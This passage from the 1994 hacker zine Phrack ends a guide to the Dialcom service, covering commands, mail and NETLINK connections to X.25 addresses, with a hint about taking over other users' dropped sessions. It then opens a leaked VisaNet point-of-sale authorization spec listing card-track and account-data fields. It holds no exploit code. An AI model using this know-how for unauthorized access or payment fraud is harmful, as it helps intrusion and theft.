Do You Want to Reconnect?
|
|||
|
|
|||
|
Which means user's HBT007 job #9 (a NETLINK command) is waiting for
|
|||
|
a reconnection. At this point, the user can continue, leaving the
|
|||
|
job to hang until the system signs it off when a certain amount of
|
|||
|
time expires; sign the job off himself; or reconnect to that job.
|
|||
|
(Try "HELP" at the prompt.) This wouldn't be important, but experience
|
|||
|
shows that many disconnections occur when someone logs into Dialcom
|
|||
|
over a network, and then uses NETLINK (or another program) to connect
|
|||
|
to another site over a network, and somewhere, some time, he issues
|
|||
|
a control sequence (let's say to tell NETLINK to do something) that
|
|||
|
gets processed by the first network, which logs him off. So there
|
|||
|
is potential to log into the middle of people's sessions (yeah, like
|
|||
|
detached ttys).
|
|||
|
|
|||
|
Common Commands
|
|||
|
~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Common commands are in reality the basic Prime commands that every
|
|||
|
account has access to. Here they are, in alphabetical order.
|
|||
|
|
|||
|
`CLEAR' Clear the screen.
|
|||
|
|
|||
|
`DATE' Shows the date at which a command was entered. Output:
|
|||
|
|
|||
|
>DATE
|
|||
|
Proceed to next command
|
|||
|
|
|||
|
>BAH
|
|||
|
|
|||
|
Friday, June 38, 1994 10:01:00 AM EDT
|
|||
|
|
|||
|
`DEL' Deletes a file.
|
|||
|
|
|||
|
`DELP' Deletes several files based on wildcards. Can verify deletion
|
|||
|
of every file, and delete only file modified before, after, or
|
|||
|
between certain dates.
|
|||
|
|
|||
|
`ED' Is the default and simplest file editor on Dialcom (some of its
|
|||
|
brothers are JED and FED). Once invoked, ED enters INPUT mode,
|
|||
|
in which the user just types text. To enter EDIT mode, where
|
|||
|
you can issue commands, you need to press <CR> on a blank line
|
|||
|
(the same thing will get you from EDIT mode back to INPUT mode).
|
|||
|
The EDIT mode uses a pointer to a line. All commands are carried
|
|||
|
on the line that the pointer points to. "T" will bring the
|
|||
|
pointer to the top of the text, "B" to the bottom, "N" to the
|
|||
|
next line down, "U" to the next line up, and "L <word>" to
|
|||
|
the line containing <word>. ED commands include:
|
|||
|
|
|||
|
P: PRINT the pointer line. P<number> will print <number>
|
|||
|
of lines.
|
|||
|
C: Change words. The format is "C/old word/new word".
|
|||
|
A: Appends words. The format is "A <words>".
|
|||
|
R: Retype pointer line. The format is "R <new line>".
|
|||
|
SP: Check the spelling of the text, and then point to
|
|||
|
the top of the text.
|
|||
|
SAVE: Will save the text and exit ED.
|
|||
|
Q: Will quit/abort editing and exit ED.
|
|||
|
|
|||
|
`F' List all file info. Output:
|
|||
|
|
|||
|
DIALCOM.TXT 001 13/30/94 13:50 ASC D W R
|
|||
|
|
|||
|
Which means file name "DIALCOM.TXT", size of 1 file blocks,
|
|||
|
lat modified on 13/30/94 at 13:50, is an ASC type file, and
|
|||
|
the account has the permissions to D(elete), W(rite), and
|
|||
|
R(ead) it.
|
|||
|
|
|||
|
`HELP' (`?') Displays a nicely formatted menu of available commands.
|
|||
|
|
|||
|
`INFO' System info. INFO <info-file-name> displays an information
|
|||
|
file, for example, INFO NETLINK.
|
|||
|
|
|||
|
"INFO ?" lists info files.
|
|||
|
"INFO BRIEF" lists info files grouped by application
|
|||
|
"INFO INFO" lists info files with their descriptions.
|
|||
|
|
|||
|
`L' List all file names. Output:
|
|||
|
|
|||
|
<S666-6>HBT007 (Owner)
|
|||
|
|
|||
|
DIALCOM.TXT
|
|||
|
|
|||
|
`LS' Display information about available segments and the account's
|
|||
|
access to them. Output:
|
|||
|
|
|||
|
2 Private static segments.
|
|||
|
segment access
|
|||
|
--------------
|
|||
|
4000 RWX
|
|||
|
4001 RWX
|
|||
|
|
|||
|
11 Private dynamic segments.
|
|||
|
segment access
|
|||
|
--------------
|
|||
|
4365 RX
|
|||
|
4366 RX
|
|||
|
4367 RWX
|
|||
|
4370 RWX
|
|||
|
4371 RX
|
|||
|
4372 RWX
|
|||
|
4373 RX
|
|||
|
4374 RWX
|
|||
|
4375 RX
|
|||
|
4376 RX
|
|||
|
4377 RWX
|
|||
|
|
|||
|
`NAME' Changes UFD name. Output:
|
|||
|
|
|||
|
>NAME
|
|||
|
|
|||
|
Old Name: John Gacy
|
|||
|
UFD Name: Herd Beast
|
|||
|
All done
|
|||
|
|
|||
|
>WHO
|
|||
|
|
|||
|
Herd Beast <S666-6>HBT007
|
|||
|
|
|||
|
`NETWORK' Accesses a database that contains dial-up number for Sprintnet,
|
|||
|
Tymnet, Datapac and Dialcom's Dialnet by State/City.
|
|||
|
|
|||
|
`OFF' Sign off the system.
|
|||
|
|
|||
|
`ONLINE' Who's online? The amount of data displayed depends on the
|
|||
|
account's seclev. Seclevs below 4 are restricted to seeing
|
|||
|
only users of their group. Output:
|
|||
|
|
|||
|
HBT007 PRK017 MJR
|
|||
|
|
|||
|
`PAD' Allows you to send commands to an X.29 PAD, these commands
|
|||
|
being the SET/SET?/PAR? commands and their parameter/value
|
|||
|
pairs.
|
|||
|
|
|||
|
`PASSWD' Change your password. PASSWD has two forms: a short one,
|
|||
|
which just changes the user's password, and a long form,
|
|||
|
invoked by PASSWD -LONG, which allows the user to set
|
|||
|
a second password for other users accessing his directory,
|
|||
|
and also to determine if they can have owner access to
|
|||
|
the directory.
|
|||
|
|
|||
|
`PROTECT' Protects a file (removes permissions from it).
|
|||
|
|
|||
|
"PROTECT DIALCOM.TXT" will remove all three (D, W, R)
|
|||
|
attributes from it. This will result in:
|
|||
|
|
|||
|
>DEL DIALCOM.TXT
|
|||
|
Insufficient access rights. DIALCOM.TXT (DEL:10)
|
|||
|
|
|||
|
But --
|
|||
|
|
|||
|
>DELETE DIALCOM.TXT
|
|||
|
"DIALCOM.TXT" protected, ok to force delete? y
|
|||
|
|
|||
|
`SECLEV' Your security level. Output:
|
|||
|
|
|||
|
Seclev=5
|
|||
|
|
|||
|
`SIZE' Size information about a file. Output:
|
|||
|
|
|||
|
1 Block, 404 Words
|
|||
|
|
|||
|
`STORAGE' Shows storage information.
|
|||
|
|
|||
|
`SY' Show users on system. (Same restrictions as for ONLINE apply.)
|
|||
|
Will show user name, time on, idle time, devices used, current
|
|||
|
jobs and state, etc. Output:
|
|||
|
|
|||
|
41 Users on sys 666
|
|||
|
|
|||
|
Names use idle mem State command object devs
|
|||
|
|
|||
|
HBT007 *11 0 155 R1 SY 6 3 from Tymnet via X.25
|
|||
|
|
|||
|
|
|||
|
`SYS' Displays account information and system number. Output:
|
|||
|
|
|||
|
<S666-6>HBT007 on system 666.
|
|||
|
|
|||
|
`TERM' Used to tell the Dialcom computer what terminal the user is
|
|||
|
using. A list of supported terminals is generated by "TERM
|
|||
|
TERMINALS". TERM options are:
|
|||
|
|
|||
|
TYPE <terminal type> (TYPE VT100)
|
|||
|
WIDTH <width> (Terminal width, if different
|
|||
|
than default)
|
|||
|
TOP (Start listings at top of screen)
|
|||
|
PAUSE (Pause listings when screen is
|
|||
|
full)
|
|||
|
|
|||
|
-ERASE, -KILL <char> (Sets the erase or kill character)
|
|||
|
-BREAK <ON|OFF> (Enables or disables BREAKs)
|
|||
|
-HALF or -FULL (Half duplex of full duplex)
|
|||
|
-DISPLAY (Output current terminal information)
|
|||
|
|
|||
|
`WHO' Displays account information. Output:
|
|||
|
|
|||
|
<S666-6>HBT007
|
|||
|
|
|||
|
Which means user HBT007 on system 666 on device 6.
|
|||
|
|
|||
|
Communicating on Dialcom
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Users who want to communicate on Dialcom have two choices, basically.
|
|||
|
These are the Dialcom bulletin board and electronic mail. The Dialcom
|
|||
|
bulletin board has two versions. The first consists of several message
|
|||
|
bases (called ``categories'') which are shared between some Dialcom
|
|||
|
systems (and mostly used by bored employees, it seems); there are also
|
|||
|
private bulletin boards, which are not shared between the systems. They
|
|||
|
belong to account groups, and only users in an account group can access
|
|||
|
that group's bulletin board system. These version of the Dialcom board
|
|||
|
are often empty (they have no categories defined and hence are unusable).
|
|||
|
|
|||
|
This is accessed by the command POST (PRPOST for the private board).
|
|||
|
Once POST is activated, it will display a prompt:
|
|||
|
|
|||
|
Send, Read or Purge:
|
|||
|
|
|||
|
If the answer is READ, POST will ask for a category (a list of categories
|
|||
|
will be displayed if you type HELP at that prompt). Once a category
|
|||
|
has been joined, you will be able to read through the messages there:
|
|||
|
|
|||
|
Subject: ?
|
|||
|
From: HBT007 Posted: Sat 32-July-94 16:47 Sys 666
|
|||
|
|
|||
|
quit
|
|||
|
/q
|
|||
|
/quit
|
|||
|
|
|||
|
Continue to Next Item?
|
|||
|
|
|||
|
Answering SEND at the first prompt will allow you to send a message in a
|
|||
|
category.
|
|||
|
|
|||
|
Answering PURGE will allow you to delete messages post by your account.
|
|||
|
When you enter PURGE and the category to purge message from, the system
|
|||
|
will show you any posts that you are allowed to purge, followed by a
|
|||
|
"Disposition:" prompt. Enter DELETE to delete the message.
|
|||
|
|
|||
|
The second way to communicate is the Dialcom MAIL system. MAIL allows
|
|||
|
sending and receiving messages, it allows for mailing lists, filing
|
|||
|
mail into categories, holding mail to read later and so on. MAIL is
|
|||
|
invoked by entering, uh... oh, yes, MAIL.
|
|||
|
|
|||
|
It works along similar lines to those of POST, and will display the following
|
|||
|
prompt:
|
|||
|
|
|||
|
Send, Read or Scan:
|
|||
|
|
|||
|
SEND: Allows you to send a message. It will prompt with "To:",
|
|||
|
"Subject:" and "Text:" (where you enter the actual message, followed
|
|||
|
by ".SEND" on a blank line to end). After a message is sent, the
|
|||
|
"To:" prompt will appear again -- use "QUIT" to leave it.
|
|||
|
|
|||
|
A word about the "To:" prompt. There are two configuration files which
|
|||
|
make its use easier. First the MAIL.REF file, which is really a mailing
|
|||
|
list file. It contains entries in the format of --
|
|||
|
|
|||
|
<Nick> <Accounts>
|
|||
|
DOODZ DVR014 ABC0013 XYZ053
|
|||
|
|
|||
|
-- and at the "To:" prompt, you can just enter "DOODZ" and the message
|
|||
|
will be sent to all three accounts. When you enter a name, MAIL searches
|
|||
|
through your MAIL.REF, and then through the account administrator's, and
|
|||
|
only then parses it as an account name. Second is the mail directory,
|
|||
|
which contains the names and account IDs of many users the account is
|
|||
|
in contact with. To display it, type "DIS DIR" at the first prompt.
|
|||
|
You'll get something like this:
|
|||
|
|
|||
|
HERD-BEAST 6666:HBT007 WE'RE BAD AND WE'RE KRAD
|
|||
|
|
|||
|
Which means you can type "HERD-BEAST" at the prompt, and not just
|
|||
|
HBT007. Also, there are special options for the "To:" prompt, most
|
|||
|
notable are: CC to send a carbon copy; EX to send the message with
|
|||
|
``express priority''; DAR to request that if the message is sent
|
|||
|
to a user on another Dialcom system, POSTMASTER will send you a
|
|||
|
message verifying that your message has been sent; and NOSHOW,
|
|||
|
to keep the receiver from seeing everybody else on the "To:" list.
|
|||
|
For example (all these people are in the mail directory),
|
|||
|
|
|||
|
To: DUNKIN D.DREW CC FOLEY NOSHOW EX
|
|||
|
|
|||
|
You enter the message about to be sent at the "Text:" prompt. That
|
|||
|
mode accepts several commands (like .SEND), all of which begin with a
|
|||
|
dot. Any command available at the "To:" prompt is available here.
|
|||
|
For example, you can add or remove names from to "To:" field using
|
|||
|
".TO <ids>" or ".TO -<ids>", and add a CC using ".CC <id>".
|
|||
|
You also have a display command, ".DIS". ".DIS" alone shows the text
|
|||
|
entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows
|
|||
|
the entire header; etc. Finally, you have editing option. ".ED" will
|
|||
|
load editing mode, so you can change the text you entered. ".LOAD
|
|||
|
<filename>" will load <filename> into the text of the message. ".SP"
|
|||
|
will check the spelling of text in the message, and there are other
|
|||
|
commands.
|
|||
|
|
|||
|
READ: Allows you to read mail in your mailbox. Once you enter READ,
|
|||
|
MAIL will display the header of the first message in your mailbox
|
|||
|
(or "No mail at this time") followed by a "--More--" prompt. To
|
|||
|
read the message, press <CR>; otherwise, enter NO. After you are done
|
|||
|
reading a message, you will be prompted with the "Disposition:" prompt,
|
|||
|
where you must determine what to do with the message. There you can enter
|
|||
|
several commands: AGAIN to read the message again; AG HE to read the
|
|||
|
header again; AP REPLY to reply to the message and append the original
|
|||
|
message to the reply; AP FO to forward the message to someone and add
|
|||
|
your comments to it; REPLY to reply to the sender of the message; REPLY
|
|||
|
ALL to reply to everybody on the "To:" field; FILE to file the message;
|
|||
|
SA to save the message into a text file; NEXT to read the next message
|
|||
|
in your mailbox; and D to delete the message.
|
|||
|
|
|||
|
SCAN: Allows you see a summary of the messages in the mailbox. Both
|
|||
|
READ and SCAN have options that allow you to filter the messages you
|
|||
|
want to read: FR <ids> to get only messages from <ids>; TO <ids> to
|
|||
|
get only messages sent to <ids>; 'string' to get only messages containing
|
|||
|
``string'' in the "Subject:" field; "string" to get only messages
|
|||
|
containing ``string'' in the message itself; FILE CATEGORY to get only
|
|||
|
messages filed into ``CATEGORY''; and DA Month/Day/Year to get only messages
|
|||
|
in that date (adding a '-' before or after the date will get you everything
|
|||
|
before or after that date, and it's also possible to specify two dates
|
|||
|
separated by a '-' to get everything between those dates. For example,
|
|||
|
to get all of Al Gore's messages about Clipper before August 13th:
|
|||
|
|
|||
|
READ FILE CLIPPER FR GOR 'Great stuff' DA -8/13/94
|
|||
|
|
|||
|
There is also a QS (QuickScan) command that behaves the same as SCAN,
|
|||
|
only SCAN shows the entire header, and QS just shows the "From:" field.
|
|||
|
|
|||
|
However, there is more to do here than just send, read or scan.
|
|||
|
Some of it was mentioned when explaining these commands. Both sent
|
|||
|
and received messages can be saved into a plain text file or into
|
|||
|
a special mailbox file, called MAIL.FILE. Messages filed into the
|
|||
|
MAIL.FILE can be grouped into categories in that file.
|
|||
|
|
|||
|
SAVING MESSAGES: Messages are saved by entering "SA filename" at a
|
|||
|
prompt. For sent message, it's the "Text:" prompt, while entering the
|
|||
|
message, and the command is ".SA", not "SA". For received message, it's
|
|||
|
either the "--More--" or the "Disposition:" prompt.
|
|||
|
|
|||
|
FILING MESSAGES: Messages are filed in two cases. First, the user
|
|||
|
can file any message into any directory, and second, the system files
|
|||
|
read messages that lay in the mailbox for over 30 days. Received messages
|
|||
|
are filed by entering "FILE" at the "Disposition:" prompt. This files
|
|||
|
the message into a miscellaneous category called BOX. If an optional
|
|||
|
<category-name> is added after "FILE", the message will be filed into
|
|||
|
that category. If <category-name> doesn't exist, MAIL can create it
|
|||
|
for you. After a message has been filed, it's not removed from the
|
|||
|
mailbox -- that's up to the user to do. Sent messages behaved the same
|
|||
|
way, but the command is ".FILE" from the "Text:" prompt.
|
|||
|
|
|||
|
To display categories of filed mail, enter DIS FILES at a prompt. To
|
|||
|
read or scan messages in filed, just add "FILE <category-name> after
|
|||
|
the command (READ, SCAN, etc). To delete a category, enter D FILE
|
|||
|
<category-name>. To delete a single message in a category, just use
|
|||
|
D as you would on any other message, after you read it from the
|
|||
|
MAIL.FILE.
|
|||
|
|
|||
|
Connecting via Dialcom
|
|||
|
~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Dialcom allows its customers to access other systems through it.
|
|||
|
There are some services offered specifically through Dialcom, such as
|
|||
|
the BRS/MENUS service, which is an electronic library with databases
|
|||
|
about many subjects, Telebase's Cyclopean Gateway Service, which offers
|
|||
|
access to many online database services (like Newsnet, Dialog and even BRS)
|
|||
|
and more. These services have a direct connection to Dialcom and software
|
|||
|
that maps Dialcom user ids to their own ids (it's not usually possible for
|
|||
|
someone to access one of these services without first connecting to Dialcom).
|
|||
|
|
|||
|
Another method is general connection to X.25 addresses. Since Dialcom
|
|||
|
is connected to X.25, and it allows users to use the Prime NETLINK
|
|||
|
commands, it's possible to PAD out of Dialcom!!#!
|
|||
|
|
|||
|
NETLINK is invoked by entering NETLINK. NETLINK then displays its own,
|
|||
|
'@' prompt. The commands available there are QUIT, to quit back to
|
|||
|
the OS; CONTINUE, to return to an open connection; CALL, to call an
|
|||
|
address; and D, to disconnect an open connection.
|
|||
|
|
|||
|
CALL takes addresses in several formats. A system name, to connect to
|
|||
|
a Dialcom system, or an address in the format of DNIC:NUA. For example,
|
|||
|
|
|||
|
@ CALL :666
|
|||
|
Circuit #1
|
|||
|
666 Connected
|
|||
|
[...]
|
|||
|
|
|||
|
@ CALL 3110:21300023
|
|||
|
Circuit #2
|
|||
|
21300023 Connected
|
|||
|
[...]
|
|||
|
|
|||
|
NETLINK establishes connections in the form of circuits. A circuit can
|
|||
|
be broken out of into command mode (the '@' prompt), using "<CR>@<CR>",
|
|||
|
and another can be opened, or parameters can be changed, etc.
|
|||
|
NETLINK has other commands, to log connections into a file, or set PAD
|
|||
|
parameters (SET, PAR), or turn on connection debugging, or change
|
|||
|
the default '@' prompt, and more.
|
|||
|
|
|||
|
Things to Do on Dialcom
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Much of what Dialcom offers was not covered until now and will not
|
|||
|
be covered. That's because most the services could use a file each,
|
|||
|
and because many account groups have things enabled or disabled
|
|||
|
just for them. Instead, I will write shortly about two of the more
|
|||
|
interesting things online, the news service and clipping service,
|
|||
|
and add pointers to some interesting commands to try out.
|
|||
|
|
|||
|
The news service, accessed with the NEWS command, is a database of
|
|||
|
newswires from AP, Business Wire, UPI, Reuters and PR Newswire.
|
|||
|
The user enters the database, and can search for news by keywords.
|
|||
|
|
|||
|
After entering NEWS, you will see a menu of all the news agencies.
|
|||
|
Once you choose an agency, you will enter its menu, which sometimes
|
|||
|
contains a copyright warning and terms of usage and also the list
|
|||
|
of news categories available from that agency (National, North America,
|
|||
|
Business, Sports, etc). Once you choose the category, you will be
|
|||
|
asked for the keyword to search for. If a story (or several stories) was
|
|||
|
found containing your desired keyword, you can read through the
|
|||
|
stories in the order of time, or the order they appear, or reverse
|
|||
|
order and so on, and finally mail a story to yourself, or enter new
|
|||
|
search keywords, or jump to another story, or simply quit.
|
|||
|
|
|||
|
The news clipping service, available with the command NEWSTAB, allows
|
|||
|
the user to define keyword-based rules for selecting news clippings.
|
|||
|
The system then checks every newswire that passes through it, and if
|
|||
|
it matches the rules, mails the newswire to the user.
|
|||
|
|
|||
|
After entering NEWSTAB, you are presented with a menu that allows you
|
|||
|
to show, add, delete, and alter your rules for choosing news. The rules
|
|||
|
are made using words or phrases, logical operators, wildcards and
|
|||
|
minimal punctuation. A rule can be as simple as "HACKING", which will
|
|||
|
get every newswire with the word "hacking" in it mailed to you, or
|
|||
|
if you want to be more selective, "NASA HACKING". Logical operators
|
|||
|
are either AND or OR. For example, "HACKING AND INTERNET". Wildcards
|
|||
|
are either '*' or '?' (both function as the same). They simple replace
|
|||
|
any number of letters. Punctuation is permitted for initials,
|
|||
|
abbreviations, apostrophes or hyphens, but not for question marks and
|
|||
|
similar. All of this is explained in the NEWSTAB service itself.
|
|||
|
|
|||
|
For the file hungry, Dialcom offers several file transfer programs,
|
|||
|
including KERMIT and Dialcom's FT, which implements most popular
|
|||
|
protocols, like Zmodem, Xmodem, etc.
|
|||
|
|
|||
|
A small number of other fun things to try:
|
|||
|
|
|||
|
NET-TALK The ``interactive computer conferencing system'' -- build
|
|||
|
your private IRC!
|
|||
|
|
|||
|
CRYPTO Dialcom's encryption program. Something they're probably
|
|||
|
going to love on sci.crypt.
|
|||
|
|
|||
|
NUSAGE By far one of the better things to do on Dialcom, it was
|
|||
|
left out of this file because it is simply huge. This
|
|||
|
program allows the user (typically an administrator) to
|
|||
|
monitor network usage, sort the data, store it, peek
|
|||
|
into all the little details (virtual connection types,
|
|||
|
remote/local addresses, actions, time, commands, etc).
|
|||
|
Unfortunately, it's completely beyond the scope of this
|
|||
|
file, as there are tons of switches and options to use
|
|||
|
in order to put this program to effective use.
|
|||
|
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 15 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
visanetoperations; part1
|
|||
|
|
|||
|
obtainedandcompiled
|
|||
|
|
|||
|
by
|
|||
|
|
|||
|
icejey
|
|||
|
/\
|
|||
|
lowerfeldafederationforundercasing iiu delamolabz chuchofthenoncomformist
|
|||
|
&&
|
|||
|
theilluminatibarbershopquartet
|
|||
|
|
|||
|
greetz2; drdelam maldoror greenparadox kaleidox primalscream reddeath kerryk
|
|||
|
-------------------------- [ typed in true(c) 80 columns] ----------------------
|
|||
|
---------------------------- [ comments appear in []s ] ------------------------
|
|||
|
|
|||
|
[ section one ]
|
|||
|
[ from the word of god ]
|
|||
|
|
|||
|
-------------------------------------------------------------
|
|||
|
| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
|
|||
|
| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
|
|||
|
| \\\\\ ///// ///// //////////// /////\\\\ |
|
|||
|
| \\\\\ ///// ///// ///// ///// \\\\\ |
|
|||
|
| \\\\\ ///// ///// /////////// \\\\\\\\\\\\\\ |
|
|||
|
| \\\\\/// ///// ///// \\\\\\\\\\\\\\\\ |
|
|||
|
| \\\\\/ ///// //////////// ///// \\\\\ |
|
|||
|
| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
|
|||
|
| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
|
|||
|
-------------------------------------------------------------
|
|||
|
|
|||
|
EXTERNAL INTERFACE SPECIFICATION
|
|||
|
--------------------------------
|
|||
|
SECOND GENERATION
|
|||
|
AUTHORIZATION RECORD FORMATS
|
|||
|
|
|||
|
For Record Formats
|
|||
|
--------------------------
|
|||
|
J - PS/2000 REPS
|
|||
|
G - VisaNet Dial Debit
|
|||
|
|
|||
|
1.0 INTRODUCTION
|
|||
|
|
|||
|
2.0 APPLICABLE DOCUMENTS
|
|||
|
2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION
|
|||
|
2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE
|
|||
|
|
|||
|
3.0 AUTHORIZATION RECORD FORMATS
|
|||
|
3.01 REQUEST RECORD FORMAT
|
|||
|
3.02 RESPONSE RECORD FORMAT
|
|||
|
|
|||
|
4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
|
|||
|
4.01 RECORD FORMAT
|
|||
|
4.02 APPLICATION TYPE
|
|||
|
4.03 MESSAGE DELIMITER
|
|||
|
4.04 ACQUIRER BIN
|
|||
|
4.05 MERCHANT NUMBER
|
|||
|
4.06 STORE NUMBER
|
|||
|
4.07 TERMINAL NUMBER
|
|||
|
4.08 MERCHANT CATEGORY CODE
|
|||
|
4.09 MERCHANT COUNTRY CODE
|
|||
|
4.10 MERCHANT CITY CODE
|
|||
|
4.11 TIME ZONE DIFFERENTIAL
|
|||
|
4.12 AUTHORIZATION TRANSACTION CODE
|
|||
|
4.13 TERMINAL IDENTIFICATION NUMBER
|
|||
|
4.14 PAYMENT SERVICE INDICATOR
|
|||
|
4.15 TRANSACTION SEQUENCE NUMBER
|
|||
|
4.16 CARDHOLDER IDENTIFICATION DATA
|
|||
|
4.17 ACCOUNT DATA SOURCE
|
|||
|
4.18 CUSTOMER DATA FIELD
|
|||
|
4.18.1 TRACK 1 READ DATA
|
|||
|
4.18.2 TRACK 2 READ DATA
|
|||
|
4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
|
|||
|
4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER
|
|||
|
4.18.3.2 MANUALLY ENTERED EXPIRATION DATE
|
|||
|
4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER
|
|||
|
4.18.4.1 CHECK ACCEPTANCE ID
|
|||
|
4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA
|
|||
|
4.19 FIELD SEPARATOR
|
|||
|
4.20 CARDHOLDER IDENTIFICATION DATA
|
|||
|
4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
|
|||
|
4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
|
|||
|
4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
|
|||
|
4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm...]
|
|||
|
4.21 FIELD SEPARATOR
|
|||
|
4.22 TRANSACTION AMOUNT
|
|||
|
4.23 FIELD SEPARATOR
|
|||
|
4.24 DEVICE CODE/INDUSTRY CODE
|
|||
|
4.25 FIELD SEPARATOR
|
|||
|
4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
|
|||
|
4.27 FIELD SEPARATOR
|
|||
|
4.28 SECONDARY AMOUNT (CASHBACK)
|
|||
|
4.29 FIELD SEPARATOR
|
|||
|
4.30 MERCHANT NAME
|
|||
|
4.31 MERCHANT CITY
|
|||
|
4.32 MERCHANT STATE
|
|||
|
4.33 SHARING GROUP
|
|||
|
4.34 FIELD SEPARATOR
|
|||
|
4.35 MERCHANT ABA NUMBER
|
|||
|
4.36 MERCHANT SETTLEMENT AGENT NUMBER
|
|||
|
4.37 FIELD SEPARATOR
|
|||
|
4.38 AGENT NUMBER
|
|||
|
4.39 CHAIN NUMBER
|
|||
|
4.40 BATCH NUMBER
|
|||
|
4.41 REIMBURSEMENT ATTRIBUTE
|
|||
|
4.42 FIELD SEPARATOR
|
|||
|
4.43 APPROVAL CODE
|
|||
|
4.44 SETTLEMENT DATE
|
|||
|
4.45 LOCAL TRANSACTION DATE
|
|||
|
4.46 LOCAL TRANSACTION TIME
|
|||
|
4.47 SYSTEM TRACE AUDIT NUMBER
|
|||
|
4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE
|
|||
|
4.49 NETWORK IDENTIFICATION CODE
|
|||
|
4.50 FIELD SEPARATOR
|
|||
|
|
|||
|
5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS
|
|||
|
5.01 PAYMENT SERVICE INDICATOR
|
|||
|
5.02 STORE NUMBER
|
|||
|
5.03 TERMINAL NUMBER
|
|||
|
5.04 AUTHORIZATION SOURCE CODE
|
|||
|
5.05 TRANSACTION SEQUENCE NUMBER
|
|||
|
5.06 RESPONSE CODE
|
|||
|
5.07 APPROVAL CODE
|
|||
|
5.08 LOCAL TRANSACTION DATE
|
|||
|
5.09 AUTHORIZATION RESPONSE CODE
|
|||
|
5.10 AVS RESULT CODE
|
|||
|
5.11 TRANSACTION IDENTIFIER
|
|||
|
5.12 FIELD SEPARATOR
|
|||
|
5.13 VALIDATION CODE
|
|||
|
5.14 FIELD SEPARATOR
|
|||
|
5.15 NETWORK IDENTIFICATION CODE
|
|||
|
5.16 SETTLEMENT DATE
|
|||
|
5.17 SYSTEM TRACE AUDIT NUMBER
|
|||
|
5.18 RETRIEVAL REFERENCE NUMBER
|
|||
|
5.19 LOCAL TRANSACTION TIME
|
|||
|
|
|||
|
6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
|
|||
|
6.01 NETWORK IDENTIFICATION CODE
|
|||
|
6.02 SETTLEMENT DATE
|
|||
|
6.03 SYSTEM TRACE AUDIT NUMBER
|
|||
|
|
|||
|
7.0 CHARACTER CODE DEFINITIONS
|
|||
|
7.01 TRACK 1 CHARACTER DEFINITION
|
|||
|
7.02 TRACK 2 CHARACTER DEFINITION
|
|||
|
7.03 AUTHORIZATION MESSAGE CHARACTER SET
|
|||
|
7.04 CHARACTER CONVERSION SUMMARY
|
|||
|
7.05 ACCOUNT DATA LUHN CHECK
|
|||
|
7.06 CALCULATING AN LRC
|
|||
|
7.07 TEST DATA FOR RECORD FORMAT "J"
|
|||
|
7.07.1 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
|
|||
|
7.07.2 RESPONSE MESSAGE FOR TEST DATA
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
1.0 INTRODUCTION
|
|||
|
|
|||
|
This document describes the request and response record formats for the VisaNet
|
|||
|
second generation Point-Of-Sale (POS) authorization terminals and VisaNet
|
|||
|
Authorization services. This document describes only record formats. Other
|
|||
|
documents describe communication protocols and POS equipment processing
|
|||
|
requirements. Figure 1.0 represents the authorization request which is
|
|||
|
transmitted to VisaNet using public communication services and the
|
|||
|
authorization response returned by VisaNet. Debit transactions include a
|
|||
|
third confirmation message.
|
|||
|
|
|||
|
POS DEVICE VISANET
|
|||
|
---------- -------
|
|||
|
|
|||
|
AUTHORIZATION
|
|||
|
REQUEST
|
|||
|
| TRANSMITTED TO A
|
|||
|
|----------> VISANET AUTHORIZATION
|
|||
|
AUTHORIZATION RESPONSE
|
|||
|
HOST SYSTEM |
|
|||
|
|
|
|||
|
RETURNED BY THE |
|
|||
|
VISANET HOST TO <--------|
|
|||
|
THE POS TERMINAL
|
|||
|
|
|||
|
DEBIT RESPONSE
|
|||
|
CONFIRMATION--------------->TRANSMITTED TO
|
|||
|
HOST SYSTEM
|
|||
|
|
|||
|
FIGURE 1.0
|
|||
|
Authorization request and response.
|
|||
|
|
|||
|
This document describes the record formats to be used for the development of
|
|||
|
new applications. Current formats or transition formats will be provided on
|
|||
|
request. The usage of some fields have changed with the new record formats.
|
|||
|
Applications which were developed to previous specifications will continue to
|
|||
|
be supported by VisaNet services. The new formats and field usage is provided
|
|||
|
with the intention of moving all new applications developed to the new formats.
|
|||
|
|
|||
|
2.0 APPLICABLE DOCUMENTS
|
|||
|
|
|||
|
The following documents provide additional definitions and background.
|
|||
|
|
|||
|
2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION
|
|||
|
|
|||
|
1. EIS1051 - External Interface Specification
|
|||
|
Second Generation
|
|||
|
Authorization Link Level Protocol
|
|||
|
|
|||
|
2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE
|
|||
|
|
|||
|
1. EIS1081 - External Interface Specification
|
|||
|
Second Generation
|
